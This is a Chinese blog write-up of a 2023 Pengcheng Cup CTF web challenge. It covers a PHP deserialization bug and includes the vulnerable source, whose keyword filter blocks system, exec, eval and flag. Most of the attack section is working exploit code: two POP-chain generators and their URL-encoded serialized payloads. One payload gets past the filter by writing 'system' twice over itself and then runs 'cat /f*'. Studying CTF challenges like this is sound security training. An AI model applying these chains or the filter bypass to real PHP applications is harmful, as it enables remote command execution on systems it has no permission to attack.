【wp】2023鹏城杯初赛 Web web1(反序列化漏洞)-CSDN博客
| 阿里云国内75折 回扣 微信号:monov8 |
| 阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6 |
考点
常规的PHP反序列化漏洞+双写绕过waf 签到题
源码
<?php
show_source(__FILE__);
error_reporting(0);
class Hacker{
private $exp;
private $cmd;
public function __toString()
{
call_user_func('system', "cat /flag");
}
}
class A
{
public $hacker;
public function __toString()
{
echo $this->hacker->name;
return "";
}
}
class C
{
public $finish;
public function __get($value)
{
$this->finish->hacker();
echo 'nonono';
}
}
class E
{
public $hacker;
public function __invoke($parms1)
{
echo $parms1;
$this->hacker->welcome();
}
}
class H
{
public $username="admin";
public function __destruct()
{
$this->welcome();
}
public function welcome()
{
echo "welcome~ ".$this->username;
}
}
class K
{
public $func;
public function __call($method,$args)
{
call_user_func($this->func,'welcome');
}
}
class R
{
private $method;
private $args;
public function welcome()
{
if ($this->key === true && $this->finish1->name) {
if ($this->finish->finish) {
call_user_func_array($this->method,$this->args);
}
}
}
}
function nonono($a){
$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
return preg_replace($filter,'',$a);
}
$a = $_POST["pop"];
if (isset($a)){
unserialize(nonono($a));
}
?>代码审计
入口肯定是H. __destruct()魔术方法进去然后这里就涉及到下一步tostring()魔术方法的触发 但是这里涉及两个tostring方法 然后这里就有个非预期解
非预期解
POP链H.destruct()->Hacker.tostring()
代码构造
<?php
class Hacker{
private $exp;
private $cmd;
}
class A{
public $hacker;
}
class C{
public $finish;
}
class E{
public $hacker;
}
class H{
public $username="admin";
}
class K{
public $func;
}
class R{
private $method;
private $args;
}
$a = new H();
$a->username = new Hacker();
echo urlencode(serialize($a));payload:
O%3A1%3A%22H%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A6%3A%22Hacker%22%3A2%3A%7Bs%3A11%3A%22%00Hacker%00exp%22%3BN%3Bs%3A11%3A%22%00Hacker%00cmd%22%3BN%3B%7D%7D可以得到flag
预期解
我们触发A.tostring()的魔术方法 找到到出口call_user_func_array(),然后一步一步触发下面的魔术方法
POP链
H.destruct()->A.tostring()->C.get()->K.call()->E.invoke()->R.welcome()
代码构造
<?php
class A{
public $hacker;
}
class C{
public $finish;
}
class E{
public $hacker;
}
class H{
public $username="admin";
}
class K{
public $func;
}
class R{
private $method; //私有变量需要在里面进行赋值 或者进行一个构造函数来进行反序列化因为私有变量只有私有的类成员则只能被其定义所在的类访问
private $args;
public function __construct(){
$this->key = true; //ture 设为真才能进入if语句
@$this->finish1->name = true; //ture 设为真才能进入if语句@。当将其放置在一个 PHP 表达式之前该表达式可能产生的任何错误信息都被忽略掉。
@$this->finish->finish = true;//ture 设为真才能进入if语句
$this->method = "system"; //这个会被ban
$this->args = array("cat /f*"); // 下面这个就是构造命令执行 只有设为数组是因为这里要知道call_user_func()函数如果传入的参数是array类型的话会将数组的成员当做类名和方法
}
}
$h = new H();
$h->username = new A();
$h->username->hacker = new C();
$h->username->hacker->finish = new K();
$h->username->hacker->finish->func = new E();
$h->username->hacker->finish->func->hacker = new R();
$s = serialize($h);
$s = preg_replace("/system/", "syssystemtem", $s); //对system进行双写绕过
echo urlencode($s);
payload
O%3A1%3A%22H%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A6%3A%22hacker%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A6%3A%22finish%22%3BO%3A1%3A%22K%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A1%3A%22E%22%3A1%3A%7Bs%3A6%3A%22hacker%22%3BO%3A1%3A%22R%22%3A5%3A%7Bs%3A9%3A%22%00R%00method%22%3Bs%3A6%3A%22syssystemtem%22%3Bs%3A7%3A%22%00R%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22cat+%2Ff%2A%22%3B%7Ds%3A3%3A%22key%22%3Bb%3A1%3Bs%3A7%3A%22finish1%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bb%3A1%3B%7Ds%3A6%3A%22finish%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22finish%22%3Bb%3A1%3B%7D%7D%7D%7D%7D%7D%7D得到flag
